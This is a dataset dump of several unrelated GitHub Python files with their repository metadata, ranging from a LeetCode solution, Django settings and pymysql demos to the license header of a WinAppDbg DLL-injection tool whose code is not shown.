blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
318d451e5e9baa4b1d4cc02121cf2c36efd4eab3 | 959a7b17884aa9af1d38d9c6b0afe2045a9be5d2 | /Online Stock Span.py | 47a2706584a1006572a38de6b4dcb896fef431dd | [] | no_license | dumavit/leetcode | a1c998f4c56411b061995d939093b03f7aae366b | 866689f564125ca4152dc1b6b3d268991d7ec89a | refs/heads/master | 2022-02-07T20:44:17.388121 | 2022-01-31T21:02:28 | 2022-01-31T21:02:28 | 252,981,197 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | class StockSpanner:
def __init__(self):
self.stack = []
def next(self, price):
res = 1
while self.stack and self.stack[-1][0] <= price:
res += self.stack.pop()[1]
self.stack.append([price, res])
return res
# Your StockSpanner object will be instantiated and called as such:
# obj = StockSpanner()
# param_1 = obj.next(price)
| [
"vitalii.duma@corva.ai"
] | vitalii.duma@corva.ai |
72400439926869248265447bf85cbabdb44fbf32 | 25b0e82ec0ba2b667e6ae429e59e19333a641723 | /Python/NPTEL/src/Week7/P10.py | 6a2578fdb3ed31ec6069f5236a04636495a1740f | [] | no_license | donkhan/msc | cf897a6dbfd72845074d13842351e49ebcf04557 | 73bc12fd3ad86e6915f51adc08af836dfdc52747 | refs/heads/master | 2021-07-10T06:43:52.687825 | 2020-11-09T06:54:14 | 2020-11-09T06:54:14 | 211,588,078 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 563 | py | def func():
print()
c = 10
i = 3
while i <= 6:
j = 0
while j <= 20:
if j >= 10-i and j <= 10+i:
print("*",end = " ")
else:
print(" ",end = " ")
j = j + 1
print("\n")
i = i + 1
i = 6
while i >= 3:
j = 0
while j<= 20:
if j >= 10 - i and j <= 10 + i:
print("*", end=" ")
else:
print(" ", end=" ")
j = j + 1
print("\n")
i = i - 1
func()
| [
"donkhan"
] | donkhan |
a551061f954363fe867ae576ead48d3683dcf790 | 0f1bec24ebc7eab0a29ce433aef9ef937c91ebb7 | /commands/raxmon-monitoring-zones-traceroute | 1cc7f381fa91003d853fdb73e52ad896a86c003a | [] | no_license | bravelittlescientist/rackspace-monitoring-cli | d3f178cd1cb6e0b5675b6d2b46b0ecdaa9dcb210 | 600b08956e93fc8b61a095e4eaac45b7a637e8c1 | refs/heads/master | 2021-01-17T23:10:47.752809 | 2014-07-01T09:03:56 | 2014-07-01T09:03:56 | 21,474,623 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,677 | #!/usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pprint import pprint
try:
import simplejson as json
except ImportError:
import json
from raxmon_cli.common import run_action
from raxmon_cli.utils import str_to_dict, str_to_list
OPTIONS = [
[['--id'], {'dest': 'id', 'help': 'Monitoring zone id'}],
[['--target'], {'dest': 'target', 'help': 'Target hostname or IP address'}],
[['--target-resolver'], {'dest': 'target_resolver', 'help': 'Target resolver', 'default': 'IPv4'}]
]
REQUIRED_OPTIONS = ['id', 'target']
def callback(driver, options, args, callback):
mz = driver.get_monitoring_zone(monitoring_zone_id=options.id)
result = driver.ex_traceroute(monitoring_zone=mz, target=options.target,
target_resolver=options.target_resolver)
pprint(result)
run_action(OPTIONS, REQUIRED_OPTIONS, 'monitoring_zones', 'traceroute',
callback)
| [
"tomaz@tomaz.me"
] | tomaz@tomaz.me | |
841aba801d2d071d8dab9e4d3c0c83c024477335 | 09a8648805c390594be0908da3188f287dedc471 | /src/fundamental/accessMySQL.py | 3f65949cbc8cda3b336ba5d34b37f441ec62c19a | [
"Apache-2.0"
] | permissive | lgonline/mp | 9d17abbb41ff42fbaf1666059504e2377485c6a9 | 21ef1bfb2feacf6a7abda858c083e0c49878f889 | refs/heads/master | 2020-12-29T02:36:32.332387 | 2019-11-16T03:02:02 | 2019-11-16T03:02:02 | 44,308,720 | 1 | 1 | null | 2015-10-20T16:24:08 | 2015-10-15T09:50:46 | Python | UTF-8 | Python | false | false | 1,190 | py | __author__ = 'Administrator'
import os,sys
import pymysql
def sampleConnMysql():
try:
conn = pymysql.connect(host='localhost',user='root',passwd='123456',db='bm',port=3306,charset='utf8')
cur=conn.cursor()
cur.execute('select userid,name,password from userinfo')
data=cur.fetchall()
for d in data:
print("userid: "+str(d[0])+' name: '+d[1]+" password: "+d[2])
cur.close()
conn.close()
except Exception:
print("the exception was throw.")
def connMySQLDemo():
import pymysql
conn = pymysql.Connection(host='127.0.0.1', user='root', passwd='123456')
cur = conn.cursor()
try:
cur.execute("drop database mpdb")
except Exception as e:
print(e)
finally:
pass
cur.execute("create database mpdb")
cur.execute("use mpdb")
cur.execute("create table users(id int,name varchar(8))")
cur.execute("insert into users values(1,'www'),(2,'cnblogs'),(3,'com'),(4,'peter')")
cur.execute('select * from users')
for row in cur.fetchall():
print(row)
cur.close()
conn.commit()
conn.close()
if __name__ == '__main__':
pass | [
"lg_online@hotmail.com"
] | lg_online@hotmail.com |
44e1074a660ff7b36fd8603cd447819137ad3819 | ead9779110c2a0371ba3354b4bae4c5aa351424f | /project/project-template/project_name/woot/settings/staging.py | b6fed3aa53e84f0dc8406a81501e98ee93d19af0 | [] | no_license | NicholasPiano/django-skeleton-templates | 744ced68cd0efb3cf3b2c05cc447c25ffdbc2bfb | 3677ac05acd48fe14fc1292452b909c2ca7d4a85 | refs/heads/master | 2021-01-20T04:30:19.676492 | 2015-03-28T19:09:12 | 2015-03-28T19:09:12 | 25,471,712 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,710 | py | # {{project_name}}.settings.staging
# django
# local
from woot.settings.common import *
# util
from os import environ
########## DEBUG CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
TEMPLATE_DEBUG = DEBUG
########## END DEBUG CONFIGURATION
########## DATABASE CONFIGURATION
DATABASE_USER = environ.get('DB_USER')
DATABASE_PWD = environ.get('DB_PWD')
# mysql: https://github.com/PyMySQL/mysqlclient-python
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2' for PG
'NAME': '',
'USER': '',
'PASSWORD': '',
'HOST': '', # Set to empty string for localhost.
'PORT': '', # Set to empty string for default.
}
}
########## END DATABASE CONFIGURATION
########## CACHE CONFIGURATION
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
'LOCATION': '127.0.0.1:11211',
}
}
########## END CACHE CONFIGURATION
########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = '{{ secret_key }}'
########## END SECRET CONFIGURATION
########## TOOLBAR CONFIGURATION
# See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation
INSTALLED_APPS += (
'debug_toolbar',
)
# See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation
INTERNAL_IPS = ('127.0.0.1',)
# See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation
MIDDLEWARE_CLASSES += (
'debug_toolbar.middleware.DebugToolbarMiddleware',
)
DEBUG_TOOLBAR_CONFIG = {
}
########## END TOOLBAR CONFIGURATION
| [
"nicholas.d.piano@gmail.com"
] | nicholas.d.piano@gmail.com |
9033c26e3bd828fc81eef756c10dad8deec587df | 4cc22dad5cd0e05ea22f5aa1177e5a85fb6471ad | /gokart_pipeliner/pipeliner.py | efe905e6e831fd4237b6b801e771b0537b963537 | [
"MIT"
] | permissive | hirosassa/gokart-pipeliner | 2029544626bb17e207fdc3a19a238139a8c2617d | ec9aef9228e0de2363520974a266c069ddea0e37 | refs/heads/main | 2023-02-01T01:09:19.001282 | 2020-12-12T13:03:51 | 2020-12-12T13:03:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,157 | py | from typing import List
import luigi
import gokart
from gokart_pipeliner.instantiation_task import InstantiationTask
from gokart_pipeliner.enum import TYPING
from gokart_pipeliner.config_manager import ConfigManager
class GokartPipeliner:
def __init__(self,
params: TYPING.PARAMS = dict(),
config_path_list: TYPING.STR_LIST = list()):
self.config = ConfigManager(params, config_path_list)
def run(self,
tasks: List[luigi.task_register.Register],
params: TYPING.PARAMS = dict()):
params = self.config.make_running_params(params)
task = InstantiationTask.run(tasks, params=params)
luigi.build([task], local_scheduler=True)
def print_dependence_tree(self,
tasks: List[luigi.task_register.Register],
params: TYPING.PARAMS = dict()):
params = self.config.make_running_params(params)
task = InstantiationTask.run(tasks, params=params)
print("//-----[dependence_tree]------")
print(gokart.info.make_tree_info(task))
print("//----------------------------")
| [
"6syun9@gmail.com"
] | 6syun9@gmail.com |
e0b7ad7303a8e55c71905b535a4ea019af5c1c13 | 727a528cb2361ef7ea2043f66daa8dfc02f1d56e | /movies_project/movies/management/commands/remove_unused_movies.py | 2aa804936cdeb24280b884a72b9a80e6d94ec7c2 | [
"MIT"
] | permissive | TonyGu423/movies | a6e11fb7b4c1b2feb3bc928cace77b8f7ab6e79f | dbdb234119f88939ee485df69536bdbc091b8909 | refs/heads/master | 2021-01-16T20:43:36.121985 | 2015-10-26T12:24:00 | 2015-10-26T12:24:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 340 | py | from movies.models import Movie
from django.core.management.base import BaseCommand
class Command(BaseCommand):
help = 'Removes unused movies'
def handle(self, *args, **options):
for movie in Movie.objects.all():
if not movie.records.exists():
movie.delete()
print movie.title
| [
"desecho@gmail.com"
] | desecho@gmail.com |
9f91e065dafd1449d8ae3bcc61105cccd7df254c | c41f97ac62188860534da88e7c809036857b1876 | /02-Code.py | 967d6c25ccf9d511d4796b3bca591b409288a54a | [] | no_license | ravi4all/AdvPython_March | 210280594bc4651583fc22ef7a6d45deecbce2fc | b6385d7f19025cdb1f061046603c66fdcfebc57a | refs/heads/master | 2020-04-29T07:59:04.193110 | 2019-03-23T12:41:38 | 2019-03-23T12:41:38 | 175,970,678 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 352 | py | class Student():
id = None
name = None
marks = None
standard = 8
data = []
def showStudent(self,id,name,marks):
self.data.append([id,name,marks,self.standard])
print(self.data)
s_1 = Student()
s_1.standard = 9
s_1.showStudent(101,'Ram',78.6)
s_2 = Student()
s_2.showStudent(102,'Raman',86.5)
| [
"noreply@github.com"
] | ravi4all.noreply@github.com |
490864555c3152ac58cf916babb377112092e85c | 116acf603f5db8d626247355bf786c339ba95ea9 | /apps/inforguide/handler.py | 3a910bddbbc0ec0c4702466cf035bc334848fd3f | [] | no_license | dahunuaa/ZhihuiSMB_python3 | 0857afeec2337b44571986a9c70c26e716142ccb | 8db2708efccd5eefa393738500e326bd7fb65c21 | refs/heads/master | 2021-01-25T14:32:32.201879 | 2018-03-11T05:59:10 | 2018-03-11T05:59:10 | 123,703,184 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,324 | py | # -*- coding:utf-8 -*-
from ZhihuiSMB.apps.base.handler import MultiStandardHandler,SingleStandardHanler,TokenHandler
from ZhihuiSMB.libs.oauthlib import get_provider
from ZhihuiSMB.libs.loglib import get_logger
logger = get_logger("debug")
class InforguideListHandler(MultiStandardHandler,TokenHandler):
_model = "inforguide.InforguideModel"
enable_methods = ["post","get"]
private = False
class InforguideHandler(SingleStandardHanler,TokenHandler):
_model = "inforguide.InforguideModel"
enable_methods = ["get","put","delete"]
private = False
class InforguideClassifyHandler(MultiStandardHandler,TokenHandler):
_model = "inforguide.InforguideModel"
enable_methods = ["get"]
private = False
def get(self):
self.result["data"] = self.model.classify()
self.finish(self.result)
class InforguideUpdateHandler(MultiStandardHandler,TokenHandler):
_model = "inforguide.InforguideModel"
enable_methods = ["get"]
private = False
def _get(self):
self.model.update()
handlers = [
(r"",InforguideListHandler,get_provider("inforguide")),
(r"/classify",InforguideClassifyHandler,get_provider("inforguide")),
# (r"/update",InforguideUpdateHandler,get_provider("inforguide")),
(r"/(.*)",InforguideHandler,get_provider("inforguide"))
]
| [
"dahu yao"
] | dahu yao |
8544d26a3c301bbbd0ba99500ab5335cb78b23ce | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02382/s791282888.py | a561149827dff37dff5d772184eb82b93aeb25a2 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 604 | py | #! python 3
# distance_ii.py
import math
def minkovski(a, b, p):
if p == 'inf':
tmp_arr = [abs(x-y) for x, y in zip(a, b)]
max_val = tmp_arr[0]
for i in range(1, len(a)):
if max_val < tmp_arr[i]:
max_val = tmp_arr[i]
return max_val
else:
dst = 0
for x, y in zip(a, b):
dst += pow(abs(x-y), p)
dst = pow(dst, 1/p)
return dst
n = int(input())
a = [int(x) for x in input().split(' ')]
b = [int(x) for x in input().split(' ')]
for p in [1, 2, 3, 'inf']:
print('%.6f'%minkovski(a, b, p))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
abfea447ccb5dcc8cb7ef7aa9371f594739c1616 | 29f8b7f92eb22cc3134a16c439d3180e254df4bb | /chp12_flasktaskr_part05/project/__init__.py | d30a310dfbec437928b7a6cfbcc4ed4aac395547 | [] | no_license | Hemie143/realpython2 | 7df80dd5f61ce7cd8c31b8bf78111b8507cbdb36 | b8535ffe97594e1b18233bcd9aa0de664257cb09 | refs/heads/master | 2022-12-12T04:51:53.120131 | 2021-01-03T19:52:32 | 2021-01-03T19:52:32 | 208,735,855 | 0 | 0 | null | 2023-08-17T05:45:32 | 2019-09-16T07:22:16 | Python | UTF-8 | Python | false | false | 494 | py | # project/__init__.py
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config.from_pyfile('_config.py')
db = SQLAlchemy(app)
from chp12_flasktaskr_part05.project.users.views import users_blueprint
from chp12_flasktaskr_part05.project.tasks.views import tasks_blueprint
# from project.users.views import users_blueprint
# from project.tasks.views import tasks_blueprint
app.register_blueprint(users_blueprint)
app.register_blueprint(tasks_blueprint)
| [
"hemie143@gmail.com"
] | hemie143@gmail.com |
0928fa1442304f1c65bdf6a271a83d62dfef9e80 | dca0bd2e04dda3801d395c2a6ab2f9d95be79551 | /Python/SmallProject/three_stooges.py | 63eb8eccae942e5a7de0c7bd84bf4411c7b65899 | [] | no_license | A-khateeb/Full-Stack-Development-Path | ab8c86abea2f983fb8e0046a65b99772416c754c | 5a5eaa198367cc95a6b5638e9740f4ad564dec23 | refs/heads/master | 2021-06-01T23:52:04.965494 | 2020-05-01T22:59:20 | 2020-05-01T22:59:20 | 89,286,943 | 2 | 0 | null | 2017-12-22T22:21:52 | 2017-04-24T21:04:07 | Shell | UTF-8 | Python | false | false | 445 | py |
p = 'Hello world'
Stooges = ['Moe', 'Larry', 'Curly']
print (Stooges)
Stooges[2] = 'Shemp'
print (Stooges)
q= Stooges
q[2]= "!"
print (q)
print (Stooges)
Stooges.append('Shemp22')
print(Stooges)
print (len(['a',['b',["c"]]]))
print (len([0,1]))
print (len(["Udacity"]))
list1= [1,2]
list2 =[3,4]
list1.append(list2)
print (len(list1))
list2[1] = 5
print (list1)
'''
spy= [0,0,7]
agent = spy
spy[2]= agent[2]+1
print (spy)
print (agent)
'''
| [
"khateebafeef@gmail.com"
] | khateebafeef@gmail.com |
9902394669267c37d5bd08bb34edc9919258b642 | 48e6a442f35cace8df3a87e1660e4539a084b39e | /cluster_2/90_10/A1_pod100/traffic_matrix_1/A1_1.py | ff9e5eb1a6848b9195753f8fd17b0ca8dfe69ad7 | [] | no_license | LiYan1988/kthjocn | 9056c05e5095a93b47a22c9e027458f410c0d8f3 | 7e5de3b3fb2a48c6dcaf6d7788ab823c5c743845 | refs/heads/master | 2021-01-01T03:56:47.251908 | 2018-06-08T07:27:33 | 2018-06-08T07:27:33 | 77,261,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,740 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Aug 4 15:15:10 2016
@author: li
optimize both throughput and connections
"""
#import sys
#sys.path.insert(0, '/home/li/Dropbox/KTH/numerical_analysis/ILPs')
from sdm import *
from gurobipy import *
import pandas as pd
np.random.seed(2010)
num_cores=5
num_slots=80
mtridx = 1
time_limit_routing = 1800 # 1000
time_limit_sa = 108 # 10800
filename = 'traffic_matrix_1.csv'
# print filename
tm = []
with open(filename) as f:
reader = csv.reader(f)
for idx, row in enumerate(reader):
row = [float(u) for u in row]
tm.append(row)
tm = np.array(tm)
betav = np.array([0,
1e-5, 2e-5, 4e-5, 8e-5,
1e-4, 2e-4, 4e-4, 8e-4,
1e-3, 2e-3, 4e-3, 8e-3,
1e-2, 2e-2, 4e-2, 8e-2,
1e-1, 2e-1, 4e-1, 1, 10])
#betav = np.array([1e-3, 2e-3, 4e-3, 8e-3])
results = {}
obj_results = {}
cnk_results = {}
thp_results = {}
obj_ub = {}
cnk_ub = {}
thp_ub = {}
for beta in betav:
m = Arch1_decompose(tm, num_slots=num_slots, num_cores=num_cores,
alpha=1,beta=beta)
m.create_model_routing(mipfocus=1,timelimit=time_limit_routing,mipgap=0.05, method=2)
m.multiple_heuristic()
results[beta] = pd.DataFrame(m.heuristics_results)
obj_results[beta] = results[beta].iloc[0, :]
cnk_results[beta] = results[beta].iloc[1, :]
thp_results[beta] = results[beta].iloc[2, :]
obj_ub[beta] = m.obj_ub_
cnk_ub[beta] = m.connection_ub_
thp_ub[beta] = m.throughput_ub_
# write results
m.write_result_csv('cnklist_heuristic_%d_%.2e.csv'%(mtridx,beta), m.cnklist_)
obj_results = pd.DataFrame(obj_results)
cnk_results = pd.DataFrame(cnk_results)
thp_results = pd.DataFrame(thp_results)
obj_ub = pd.Series(obj_ub)
cnk_ub = pd.Series(cnk_ub)
thp_ub = pd.Series(thp_ub)
argmax = {betav[i]:obj_results.iloc[:, i].argmax() for i in range(len(betav))}
objmax = {betav[i]:obj_results.iloc[:, i].max() for i in range(len(betav))}
cnk_bh = {betav[i]:cnk_results.loc[argmax[betav[i]], betav[i]]
for i in range(len(betav))}
thp_bh = {betav[i]:thp_results.loc[argmax[betav[i]], betav[i]]
for i in range(len(betav))}
obj_final = pd.DataFrame({'ub':obj_ub, 'best_heuristic':objmax,
'best_method':argmax, 'cnk_bh':cnk_bh,
'thp_bh':thp_bh, 'cnk_ub':cnk_ub, 'thp_ub':thp_ub})
obj_final['optimality'] = obj_final['best_heuristic']/obj_final['ub']
obj_results.to_csv('obj_results_{}.csv'.format(mtridx))
cnk_results.to_csv('cnk_results_{}.csv'.format(mtridx))
thp_results.to_csv('thp_results_{}.csv'.format(mtridx))
obj_final.to_csv('obj_final_{}.csv'.format(mtridx)) | [
"li.yan.ly414@gmail.com"
] | li.yan.ly414@gmail.com |
fe051cda5eea45aaa1903b017a8c2a6d1ee5e14c | d5ee6e6bd1df32a123558e6e4a79c3ad17db19bc | /news/managers.py | 0c53ab2888fd1d4280c4654b067893967f34b36b | [] | no_license | trailhawks/lawrencetrailhawks.com | 06d9f3f0753f0529718a14540858637b5bdfae3d | b250c131cd655e9b43b27834db702e3a853df88b | refs/heads/master | 2021-06-10T11:22:20.435575 | 2016-12-23T08:58:08 | 2016-12-23T08:58:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 794 | py | import datetime
from django.db.models import Manager
from django.db.models.query import QuerySet
from django.utils import timezone
class NewsQuerySet(QuerySet):
def draft(self):
return self.filter(status__exact=self.model.STATUS_DRAFT)
def public(self):
return self.filter(status__exact=self.model.STATUS_PUBLIC)
def recent(self):
recently = timezone.now() - datetime.timedelta(days=14)
return self.filter(pub_date__gte=recently)
class NewsManager(Manager):
def get_queryset(self):
return NewsQuerySet(self.model, using=self._db)
def draft(self):
return self.get_queryset().draft()
def public(self):
return self.get_queryset().public()
def recent(self):
return self.get_queryset().recent()
| [
"jeff.triplett@gmail.com"
] | jeff.triplett@gmail.com |
0e4a2e05b6a37082a2b8121508a8530e3042edee | 0be484378e45f67a8ab7675498cbc80b51df8461 | /bt5/erp5_ui_test_core/SkinTemplateItem/portal_skins/erp5_ui_test_core/Zuite_setPreference.py | 1eb1be5e08970ec882a4fcc3af5d6feaed8d8519 | [] | no_license | uhml/erp5 | 7ba69b43d0f6c36e4e1b1116351788e75135889d | 41bae8338b238267d60e57a7c7aaa91b32ee0826 | refs/heads/master | 2021-01-14T13:21:27.340016 | 2016-08-18T10:10:56 | 2016-08-18T11:12:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,306 | py | """Set subversion working copy list and enable preference.
This script is called by Products.ERP5Type.tests.runFunctionalTest to set
subversion working copy paths and conversion server address.
It's not meant to be called by zelenium tests directly.
"""
pref = getattr(context.portal_preferences, "erp5_ui_test_preference", None)
if pref is None:
pref = context.portal_preferences.newContent(id="erp5_ui_test_preference",
portal_type="Preference",
priority=1)
pref.setPreferredSubversionWorkingCopyList(tuple(working_copy_list.split(',')))
pref.setPreferredHtmlStyleUnsavedFormWarning(False)
if pref.getPreferenceState() == 'disabled':
pref.enable()
pref = getattr(context.portal_preferences, "erp5_ui_test_system_preference", None)
if pref is None:
pref = context.portal_preferences.newContent(id="erp5_ui_test_system_preference",
portal_type="System Preference",
priority=1)
pref.setPreferredOoodocServerAddress(conversion_server_hostname)
pref.setPreferredOoodocServerPortNumber(conversion_server_port)
if pref.getPreferenceState() == 'disabled':
pref.enable()
return 'Set Preference Successfully.'
| [
"georgios.dagkakis@nexedi.com"
] | georgios.dagkakis@nexedi.com |
1460e4adc0eaf45d2f00362cbf7115fb97d33bd3 | 507b4ffbdc19614603da9c5c6ea31910fdbbf288 | /interface/labeler_client.py | c5c2eab0889b1d1660528d177857cd573207b2fd | [
"Apache-2.0"
] | permissive | jerryli27/TwinGANFrontendTemporary | 755a0e39f6f92522687cd1bd916549acd2295fd0 | 24f9327d1c50f7b54198a8d74073ca7507d715fb | refs/heads/master | 2020-03-14T12:22:12.950810 | 2018-04-30T15:14:14 | 2018-04-30T15:14:14 | 131,610,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,788 | py | import os
import util_io
import util_misc
import interface_utils
class LabelerClient(object):
def __init__(self,):
self.image_paths = []
self.sketch_paths = []
self.index = 0
self.done_image_paths = set()
self.done_image_txt_path = ''
self.sketch_folder = ''
def set_image_paths(self, image_path, finished_image_txt_path, sketch_folder, exclude_file_start={'e', 'q'}):
if image_path:
self.image_paths = util_io.get_all_image_paths(image_path)
# Danbooru specific method to filter out nsfw images.
self.image_paths = [p for p in self.image_paths if os.path.basename(p)[0] not in exclude_file_start]
self.sketch_paths = [None for _ in range(len(self.image_paths))]
self.index = 0
if finished_image_txt_path:
self.done_image_txt_path = finished_image_txt_path
dir = os.path.dirname(finished_image_txt_path)
self.colored_sketch_pair_txt_path = os.path.join(dir, 'colored_sketch_pair.txt')
util_io.touch_folder(dir)
try:
self.done_image_paths = set(util_io.get_all_image_paths(finished_image_txt_path))
except AssertionError:
pass
self.sketch_folder = sketch_folder
sketches = set([util_misc.get_no_ext_base(p) for p in util_io.get_all_image_paths(sketch_folder)])
self.image_paths = [p for p in self.image_paths if util_misc.get_no_ext_base(p) in sketches]
pass
def get_image_and_id(self):
"""Returns an image encoded in base64."""
while self.index < len(self.image_paths) and self.image_paths[self.index] in self.done_image_paths:
self.index += 1
if self.index == len(self.image_paths):
return None, None, None
image = interface_utils.get_image_encoding(self.image_paths[self.index])
image_id = os.path.basename(self.image_paths[self.index])
sketch_image_path = self.get_current_sketch_path()
sketch = interface_utils.get_image_encoding(sketch_image_path)
self.sketch_paths[self.index] = sketch_image_path
return image, sketch, image_id
def mark_current_as_done(self, is_skip):
with open(self.done_image_txt_path, 'a') as f:
f.write(self.image_paths[self.index] + '\n')
if not is_skip:
with open(self.colored_sketch_pair_txt_path, 'a') as f:
f.write(self.image_paths[self.index]+'\t' + self.sketch_paths[self.index] + '\n')
self.done_image_paths.add(self.image_paths[self.index])
self.index += 1
def get_current_sketch_path(self):
return self.get_sketch_path_for_image_name(self.image_paths[self.index])
def get_sketch_path_for_image_name(self, image_basename):
return os.path.join(self.sketch_folder, util_misc.get_no_ext_base(image_basename) + '.jpg')
def set_current_sketch_path(self, new_path):
self.sketch_paths[self.index] = new_path | [
"jerrylijiaming@gmail.com"
] | jerrylijiaming@gmail.com |
7908f51adf44b6200b10a9cc53f37fa511f66531 | f6439b5ed1614fd8db05fa963b47765eae225eb5 | /chrome/browser/extensions/api/push_messaging/DEPS | 8c7d15a911d33d64d98ca56406d3c0a18c5d4e0f | [
"BSD-3-Clause"
] | permissive | aranajhonny/chromium | b8a3c975211e1ea2f15b83647b4d8eb45252f1be | caf5bcb822f79b8997720e589334266551a50a13 | refs/heads/master | 2021-05-11T00:20:34.020261 | 2018-01-21T03:31:45 | 2018-01-21T03:31:45 | 118,301,142 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 199 | include_rules = [
"+components/invalidation",
"+google/cacheinvalidation/types.pb.h",
"+sync/internal_api/public/base/invalidation.h",
"+sync/internal_api/public/base/invalidation_util.h",
]
| [
"jhonnyjosearana@gmail.com"
] | jhonnyjosearana@gmail.com | |
68095f0f7e56c2373879c98c67cf6bbf375b3bf3 | 40dd8330e5f78c4348bbddc2c5acfd59d793dd51 | /projects/medical/2d_image/dermoscopy/isic2017_task1/configs/fcn-unet-s5-d16_unet_1xb16-0.0001-20k_isic2017-task1-512x512.py | 58d0a125d33a1948802b1bbc104095f9fdd28f54 | [
"Apache-2.0"
] | permissive | open-mmlab/mmsegmentation | 0d12092312e2c465ede1fd7dd9847b6f2b37049c | 30a3f94f3e2916e27fa38c67cc3b8c69c1893fe8 | refs/heads/main | 2023-09-04T10:54:52.299711 | 2023-07-24T07:28:21 | 2023-07-24T07:28:21 | 272,133,018 | 6,534 | 2,375 | Apache-2.0 | 2023-09-14T01:22:32 | 2020-06-14T04:32:33 | Python | UTF-8 | Python | false | false | 606 | py | _base_ = [
'mmseg::_base_/models/fcn_unet_s5-d16.py', './isic2017-task1_512x512.py',
'mmseg::_base_/default_runtime.py',
'mmseg::_base_/schedules/schedule_20k.py'
]
custom_imports = dict(imports='datasets.isic2017-task1_dataset')
img_scale = (512, 512)
data_preprocessor = dict(size=img_scale)
optimizer = dict(lr=0.0001)
optim_wrapper = dict(optimizer=optimizer)
model = dict(
data_preprocessor=data_preprocessor,
decode_head=dict(num_classes=2),
auxiliary_head=None,
test_cfg=dict(mode='whole', _delete_=True))
vis_backends = None
visualizer = dict(vis_backends=vis_backends)
| [
"noreply@github.com"
] | open-mmlab.noreply@github.com |
1cc43dc39860b3db828c76db2404cf44159f7da6 | 08ace4e8d7b2fcfa4ff4983e643873fd9c01f6de | /tools/pinject.py | ef71dd321b6524c40bc31b51194ec46cd83e3890 | [] | no_license | 0x90/winappdbg | 87d2e769707ec4ca482af0c946e02f77976314a2 | 5acffe77379836622042385460411ef4dc751d46 | refs/heads/master | 2020-09-26T08:19:10.600353 | 2019-12-06T00:42:52 | 2019-12-06T00:42:52 | 226,215,022 | 6 | 1 | null | 2019-12-06T00:41:16 | 2019-12-06T00:41:15 | null | UTF-8 | Python | false | false | 3,301 | py | #!/bin/env python
# -*- coding: utf-8 -*-
# Acknowledgements:
# Nicolas Economou, for his ptool suite on which this tool is inspired.
# http://tinyurl.com/nicolaseconomou
# Process DLL injector
# Copyright (c) 2009-2018, Mario Vilas
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice,this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
